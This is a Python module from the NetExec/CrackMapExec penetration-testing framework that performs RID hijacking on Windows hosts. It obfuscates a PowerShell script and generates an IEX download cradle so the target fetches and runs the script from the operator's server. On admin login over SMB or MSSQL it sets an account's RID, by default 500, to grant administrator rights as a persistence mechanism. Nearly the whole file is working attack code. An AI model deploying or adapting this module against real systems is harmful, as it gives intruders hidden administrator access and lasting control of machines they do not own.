NetExec/cme/modules/rid_hijack.py

90 lines
3.1 KiB
Python
Raw Normal View History

2019-02-25 01:51:16 +00:00
from cme.helpers.powershell import *
from cme.helpers.logger import write_log, highlight
from datetime import datetime
2020-04-19 18:09:32 +00:00
from io import StringIO
2019-02-25 01:51:16 +00:00
import re
class CMEModule:
'''
Executes Invoke-RIDhijacking.ps1 allowing to set desired privileges to an existent local account by modifying the Relative Identifier value copy used to create the access token
Module by Sebastian Castro @r4wd3r
'''
name = 'rid_hijack'
description = "Executes the RID hijacking persistence hook."
supported_protocols = ['smb', 'mssql']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
RID RID to set to the specified account. Default 500.
USER User to set the defined RID.
USEGUEST Boolean. Set the defined RID to the Guest account.
PASSWORD Password to set to the defined account.
ENABLE Boolean. Enable the defined account.
'''
self.rid = 500
self.user = None
self.password = None
self.useguest = False
self.enable = False
if 'RID' in module_options:
self.rid = int(module_options['RID'])
if 'USER' in module_options:
self.user = str(module_options['USER'])
if 'PASSWORD' in module_options:
self.password = str(module_options['PASSWORD'])
if 'USEGUEST' in module_options:
self.useguest = True
if 'ENABLE' in module_options:
self.enable = True
self.ps_script1 = obfs_ps_script('RID-Hijacking/Invoke-RIDHijacking.ps1')
def on_admin_login(self, context, connection):
command = 'Invoke-RIDHijacking'
command += ' -RID ' + str(self.rid)
if self.user:
command += ' -User ' + self.user
if self.password:
command += ' -Password ' + self.password
if self.useguest:
command += ' -UseGuest '
if self.enable:
command += ' -Enable '
launcher = gen_ps_iex_cradle(context, 'Invoke-RIDHijacking.ps1', command)
connection.ps_execute(launcher)
context.log.success('Executed launcher')
def on_request(self, context, request):
if 'Invoke-RIDHijacking.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script1)
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.getheader('content-length'))
data = response.rfile.read(length)
response.stop_tracking_host()
if len(data):
context.log.success('Invoke-RIDHijacking executed successfully')
buf = StringIO(data.strip()).readlines()
for line in buf:
output = filter(None, re.split(r'(?:\s*\[.\]\s)', line.strip()))
for o in output:
context.log.highlight(o)